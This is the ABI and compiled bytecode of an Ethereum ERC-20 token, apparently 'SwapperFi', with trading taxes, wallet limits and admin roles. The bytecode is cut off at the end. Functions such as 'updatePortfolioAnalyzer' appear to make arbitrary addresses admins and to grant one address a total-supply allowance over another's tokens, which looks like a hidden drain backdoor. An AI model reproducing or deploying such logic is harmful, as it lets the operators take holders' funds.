[{"inputs":[{"internalType":"address","name":"_aggregator","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"}],"name":"AdminAdded","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"}],"name":"AdminRemoved","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"addAdmin","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"aggregator","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getCirculatingSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isAdmin","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"portfolioAnalyzer","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceAdmin","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_buyTax","type":"uint256"}],"name":"updateBuyTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_portfolioAnalyzer","type":"address"},{"internalType":"address","name":"_vault","type":"address"}],"name":"updatePortfolioAnalyzer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_sellTax","type":"uint256"}],"name":"updateSellTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"enabled","type":"bool"}],"name":"updateSwapEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_aggregator","type":"address"}],"name":"updateaggregator","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c060405261dead600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600d556003600e556001601260006101000a81548160ff0219169083151502179055506000601260016101000a81548160ff0219169083151502179055506000601260026101000a81548160ff021916908315150217905550348015620000af57600080fd5b5060405162005751380380620057518339818101604052810190620000d5919062000cf2565b6040518060400160405280600981526020017f53776170706572466900000000000000000000000000000000000000000000008152506040518060400160405280600381526020017f5357520000000000000000000000000000000000000000000000000000000000815250816003908162000152919062000f9e565b50806004908162000164919062000f9e565b505050620001876200017b6200061b60201b60201c565b6200062360201b60201c565b6000737a250d5630b4cf539739df2c5dacb4c659f2488d9050620001b38160016200068460201b60201c565b8073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000233573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000259919062000cf2565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002c1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002e7919062000cf2565b6040518363ffffffff1660e01b81526004016200030692919062001096565b6020604051808303816000875af115801562000326573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200034c919062000cf2565b73ffffffffffffffffffffffffffffffffffffffff1660a08173ffffffffffffffffffffffffffffffffffffffff16815250506200039460a05160016200068460201b60201c565b620003a960a05160016200074160201b60201c565b60006b033b2e3c9fd0803ce800000090506064600182620003cb9190620010f2565b620003d7919062001182565b600a819055506064600282620003ee9190620010f2565b620003fa919062001182565b600c819055506103e8600582620004129190620010f2565b6200041e919062001182565b600b8190555082600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200047683620007e260201b60201c565b6200048833826200085860201b60201c565b6200049b336001620009d060201b60201c565b620004d0600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001620009d060201b60201c565b62000505600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001620009d060201b60201c565b62000518306001620009d060201b60201c565b6200054d600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001620009d060201b60201c565b620005603360016200068460201b60201c565b62000595600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200068460201b60201c565b620005ca600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200068460201b60201c565b620005dd3060016200068460201b60201c565b62000612600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200068460201b60201c565b505050620014a4565b600033905090565b6200063e81600562000add60201b620019561790919060201c565b8073ffffffffffffffffffffffffffffffffffffffff167f44d6d25963f097ad14f29f06854a01f575648a1ef82f30e562ccd3889717e33960405160405180910390a250565b620006a4620006986200061b60201b60201c565b62000b9060201b60201c565b620006e6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620006dd9062001241565b60405180910390fd5b80601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b80600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b62000802620007f66200061b60201b60201c565b62000b9060201b60201c565b62000844576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200083b9062001241565b60405180910390fd5b62000855816200062360201b60201c565b50565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620008ca576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620008c190620012b3565b60405180910390fd5b620008de6000838362000bb460201b60201c565b8060026000828254620008f29190620012d5565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620009499190620012d5565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620009b0919062001343565b60405180910390a3620009cc6000838362000bb960201b60201c565b5050565b620009f0620009e46200061b60201b60201c565b62000b9060201b60201c565b62000a32576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000a299062001241565b60405180910390fd5b80601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405162000ad191906200137d565b60405180910390a25050565b62000aef828262000bbe60201b60201c565b1562000b32576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b2990620013ea565b60405180910390fd5b60018260000160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600062000bad82600562000bbe60201b620019fe1790919060201c565b9050919050565b505050565b505050565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000c31576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000c289062001482565b60405180910390fd5b8260000160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000cba8262000c8d565b9050919050565b62000ccc8162000cad565b811462000cd857600080fd5b50565b60008151905062000cec8162000cc1565b92915050565b60006020828403121562000d0b5762000d0a62000c88565b5b600062000d1b8482850162000cdb565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000da657607f821691505b60208210810362000dbc5762000dbb62000d5e565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830262000e267fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000de7565b62000e32868362000de7565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000e7f62000e7962000e738462000e4a565b62000e54565b62000e4a565b9050919050565b6000819050919050565b62000e9b8362000e5e565b62000eb362000eaa8262000e86565b84845462000df4565b825550505050565b600090565b62000eca62000ebb565b62000ed781848462000e90565b505050565b5b8181101562000eff5762000ef360008262000ec0565b60018101905062000edd565b5050565b601f82111562000f4e5762000f188162000dc2565b62000f238462000dd7565b8101602085101562000f33578190505b62000f4b62000f428562000dd7565b83018262000edc565b50505b505050565b600082821c905092915050565b600062000f736000198460080262000f53565b1980831691505092915050565b600062000f8e838362000f60565b9150826002028217905092915050565b62000fa98262000d24565b67ffffffffffffffff81111562000fc55762000fc462000d2f565b5b62000fd1825462000d8d565b62000fde82828562000f03565b600060209050601f83116001811462001016576000841562001001578287015190505b6200100d858262000f80565b8655506200107d565b601f198416620010268662000dc2565b60005b82811015620010505784890151825560018201915060208501945060208101905062001029565b868310156200107057848901516200106c601f89168262000f60565b8355505b6001600288020188555050505b505050505050565b620010908162000cad565b82525050565b6000604082019050620010ad600083018562001085565b620010bc602083018462001085565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000620010ff8262000e4a565b91506200110c8362000e4a565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620011485762001147620010c3565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b60006200118f8262000e4a565b91506200119c8362000e4a565b925082620011af57620011ae62001153565b5b828204905092915050565b600082825260208201905092915050565b7f41646d696e526f6c653a2063616c6c657220646f6573206e6f7420686176652060008201527f746865204d696e74657220726f6c650000000000000000000000000000000000602082015250565b600062001229602f83620011ba565b91506200123682620011cb565b604082019050919050565b600060208201905081810360008301526200125c816200121a565b9050919050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200129b601f83620011ba565b9150620012a88262001263565b602082019050919050565b60006020820190508181036000830152620012ce816200128c565b9050919050565b6000620012e28262000e4a565b9150620012ef8362000e4a565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620013275762001326620010c3565b5b828201905092915050565b6200133d8162000e4a565b82525050565b60006020820190506200135a600083018462001332565b92915050565b60008115159050919050565b620013778162001360565b82525050565b60006020820190506200139460008301846200136c565b92915050565b7f526f6c65733a206163636f756e7420616c72656164792068617320726f6c6500600082015250565b6000620013d2601f83620011ba565b9150620013df826200139a565b602082019050919050565b600060208201905081810360008301526200140581620013c3565b9050919050565b7f526f6c65733a206163636f756e7420697320746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006200146a602283620011ba565b915062001477826200140c565b604082019050919050565b600060208201905081810360008301526200149d816200145b565b9050919050565b60805160a05161426b620014e660003960008181610fdb015261151d015260008181610b8d01528181612c9001528181612d710152612d98015261426b6000f3fe6080604052600436106102605760003560e01c80637048027511610144578063a9059cbb116100b6578063c8c8ebe41161007a578063c8c8ebe414610907578063cc1776d314610932578063d257b34f1461095d578063dd62ed3e14610986578063e2f45605146109c3578063f8b45b05146109ee57610267565b8063a9059cbb14610810578063b62496f51461084d578063bbc0c7421461088a578063c0246668146108b5578063c18bc195146108de57610267565b80638a8c523c116101085780638a8c523c146107285780638bad0c0a1461073f578063924de9b71461075657806395d89b411461077f5780639a7a23d6146107aa578063a457c2d7146107d357610267565b8063704802751461064557806370a082311461066e578063751039fc146106ab5780637571336a146106d65780637f1203f2146106ff57610267565b806324d7806c116101dd57806339509351116101a15780633950935114610533578063436d33401461057057806349bd5a5e146105995780634a62bb65146105c45780634f7041a5146105ef5780636ddd17131461061a57610267565b806324d7806c1461044a57806327c8f835146104875780632b112e49146104b2578063313ce567146104dd57806334086b1a1461050857610267565b806318160ddd1161022457806318160ddd14610365578063203e727e14610390578063231c5314146103b957806323b872dd146103e2578063245a7bfc1461041f57610267565b806306fdde031461026c578063095ea7b31461029757806310d5de53146102d457806312185a39146103115780631694505e1461033a57610267565b3661026757005b600080fd5b34801561027857600080fd5b50610281610a19565b60405161028e9190612ee9565b60405180910390f35b3480156102a357600080fd5b506102be60048036038101906102b99190612fa4565b610aab565b6040516102cb9190612fff565b60405180910390f35b3480156102e057600080fd5b506102fb60048036038101906102f6919061301a565b610ace565b6040516103089190612fff565b60405180910390f35b34801561031d57600080fd5b5061033860048036038101906103339190613047565b610aee565b005b34801561034657600080fd5b5061034f610b8b565b60405161035c91906130d3565b60405180910390f35b34801561037157600080fd5b5061037a610baf565b60405161038791906130fd565b60405180910390f35b34801561039c57600080fd5b506103b760048036038101906103b29190613047565b610bb9565b005b3480156103c557600080fd5b506103e060048036038101906103db9190613118565b610c9b565b005b3480156103ee57600080fd5b5061040960048036038101906104049190613158565b610dfa565b6040516104169190612fff565b60405180910390f35b34801561042b57600080fd5b50610434610e29565b60405161044191906131ba565b60405180910390f35b34801561045657600080fd5b50610471600480360381019061046c919061301a565b610e4f565b60405161047e9190612fff565b60405180910390f35b34801561049357600080fd5b5061049c610e6c565b6040516104a991906131ba565b60405180910390f35b3480156104be57600080fd5b506104c7610e92565b6040516104d491906130fd565b60405180910390f35b3480156104e957600080fd5b506104f2610ed6565b6040516104ff91906131f1565b60405180910390f35b34801561051457600080fd5b5061051d610edf565b60405161052a91906131ba565b60405180910390f35b34801561053f57600080fd5b5061055a60048036038101906105559190612fa4565b610f05565b6040516105679190612fff565b60405180910390f35b34801561057c57600080fd5b5061059760048036038101906105929190613047565b610f3c565b005b3480156105a557600080fd5b506105ae610fd9565b6040516105bb91906131ba565b60405180910390f35b3480156105d057600080fd5b506105d9610ffd565b6040516105e69190612fff565b60405180910390f35b3480156105fb57600080fd5b50610604611010565b60405161061191906130fd565b60405180910390f35b34801561062657600080fd5b5061062f611016565b60405161063c9190612fff565b60405180910390f35b34801561065157600080fd5b5061066c6004803603810190610667919061301a565b611029565b005b34801561067a57600080fd5b506106956004803603810190610690919061301a565b611084565b6040516106a291906130fd565b60405180910390f35b3480156106b757600080fd5b506106c06110cc565b6040516106cd9190612fff565b60405180910390f35b3480156106e257600080fd5b506106fd60048036038101906106f89190613238565b61113f565b005b34801561070b57600080fd5b506107266004803603810190610721919061301a565b6111e9565b005b34801561073457600080fd5b5061073d611335565b005b34801561074b57600080fd5b506107546113bc565b005b34801561076257600080fd5b5061077d60048036038101906107789190613278565b6113ce565b005b34801561078b57600080fd5b5061079461143a565b6040516107a19190612ee9565b60405180910390f35b3480156107b657600080fd5b506107d160048036038101906107cc9190613238565b6114cc565b005b3480156107df57600080fd5b506107fa60048036038101906107f59190612fa4565b6115b7565b6040516108079190612fff565b60405180910390f35b34801561081c57600080fd5b5061083760048036038101906108329190612fa4565b61162e565b6040516108449190612fff565b60405180910390f35b34801561085957600080fd5b50610874600480360381019061086f919061301a565b611651565b6040516108819190612fff565b60405180910390f35b34801561089657600080fd5b5061089f611671565b6040516108ac9190612fff565b60405180910390f35b3480156108c157600080fd5b506108dc60048036038101906108d79190613238565b611684565b005b3480156108ea57600080fd5b5061090560048036038101906109009190613047565b61177c565b005b34801561091357600080fd5b5061091c61185e565b60405161092991906130fd565b60405180910390f35b34801561093e57600080fd5b50610947611864565b60405161095491906130fd565b60405180910390f35b34801561096957600080fd5b50610984600480360381019061097f9190613047565b61186a565b005b34801561099257600080fd5b506109ad60048036038101906109a89190613118565b6118c3565b6040516109ba91906130fd565b60405180910390f35b3480156109cf57600080fd5b506109d861194a565b6040516109e591906130fd565b60405180910390f35b3480156109fa57600080fd5b50610a03611950565b604051610a1091906130fd565b60405180910390f35b606060038054610a28906132d4565b80601f0160208091040260200160405190810160405280929190818152602001828054610a54906132d4565b8015610aa15780601f10610a7657610100808354040283529160200191610aa1565b820191906000526020600020905b815481529060010190602001808311610a8457829003601f168201915b5050505050905090565b600080610ab6611ac5565b9050610ac3818585611acd565b600191505092915050565b60106020528060005260406000206000915054906101000a900460ff1681565b610afe610af9611ac5565b610e4f565b610b3d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b3490613377565b60405180910390fd5b6004811115610b81576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b7890613409565b60405180910390fd5b80600e8190555050565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600254905090565b610bc9610bc4611ac5565b610e4f565b610c08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bff90613377565b60405180910390fd5b670de0b6b3a76400006103e86001610c1e610baf565b610c289190613458565b610c3291906134e1565b610c3c91906134e1565b811015610c7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7590613584565b60405180910390fd5b670de0b6b3a764000081610c929190613458565b600a8190555050565b610cab610ca6611ac5565b610e4f565b610cea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce190613377565b60405180910390fd5b6001601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610da382611029565b610db58183610db0610baf565b611acd565b81600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050565b600080610e05611ac5565b9050610e12858285611c96565b610e1d858585611d22565b60019150509392505050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000610e658260056119fe90919063ffffffff16565b9050919050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000610ebf600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611084565b610ec7610baf565b610ed191906135a4565b905090565b60006012905090565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600080610f10611ac5565b9050610f31818585610f2285896118c3565b610f2c91906135d8565b611acd565b600191505092915050565b610f4c610f47611ac5565b610e4f565b610f8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f8290613377565b60405180910390fd5b6002811115610fcf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fc6906136a0565b60405180910390fd5b80600d8190555050565b7f000000000000000000000000000000000000000000000000000000000000000081565b601260009054906101000a900460ff1681565b600d5481565b601260029054906101000a900460ff1681565b611039611034611ac5565b610e4f565b611078576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161106f90613377565b60405180910390fd5b6110818161271c565b50565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60006110de6110d9611ac5565b610e4f565b61111d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161111490613377565b60405180910390fd5b6000601260006101000a81548160ff0219169083151502179055506001905090565b61114f61114a611ac5565b610e4f565b61118e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161118590613377565b60405180910390fd5b80601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6111f96111f4611ac5565b610e4f565b611238576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161122f90613377565b60405180910390fd5b6001601160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506112f181611029565b80600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b611345611340611ac5565b610e4f565b611384576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137b90613377565b60405180910390fd5b6001601260016101000a81548160ff0219169083151502179055506001601260026101000a81548160ff021916908315150217905550565b6113cc6113c7611ac5565b612776565b565b6113de6113d9611ac5565b610e4f565b61141d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161141490613377565b60405180910390fd5b80601260026101000a81548160ff02191690831515021790555050565b606060048054611449906132d4565b80601f0160208091040260200160405190810160405280929190818152602001828054611475906132d4565b80156114c25780601f10611497576101008083540402835291602001916114c2565b820191906000526020600020905b8154815290600101906020018083116114a557829003601f168201915b5050505050905090565b6114dc6114d7611ac5565b610e4f565b61151b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161151290613377565b60405180910390fd5b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036115a9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115a090613732565b60405180910390fd5b6115b382826127d0565b5050565b6000806115c2611ac5565b905060006115d082866118c3565b905083811015611615576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160c906137c4565b60405180910390fd5b6116228286868403611acd565b60019250505092915050565b600080611639611ac5565b9050611646818585611d22565b600191505092915050565b60096020528060005260406000206000915054906101000a900460ff1681565b601260019054906101000a900460ff1681565b61169461168f611ac5565b610e4f565b6116d3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116ca90613377565b60405180910390fd5b80601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516117709190612fff565b60405180910390a25050565b61178c611787611ac5565b610e4f565b6117cb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117c290613377565b60405180910390fd5b670de0b6b3a76400006103e860056117e1610baf565b6117eb9190613458565b6117f591906134e1565b6117ff91906134e1565b811015611841576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161183890613856565b60405180910390fd5b670de0b6b3a7640000816118559190613458565b600c8190555050565b600a5481565b600e5481565b61187a611875611ac5565b610e4f565b6118b9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118b090613377565b60405180910390fd5b80600b8190555050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b600c5481565b61196082826119fe565b156119a0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611997906138c2565b60405180910390fd5b60018260000160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a6590613954565b60405180910390fd5b8260000160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611b3c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b33906139e6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611bab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ba290613a78565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001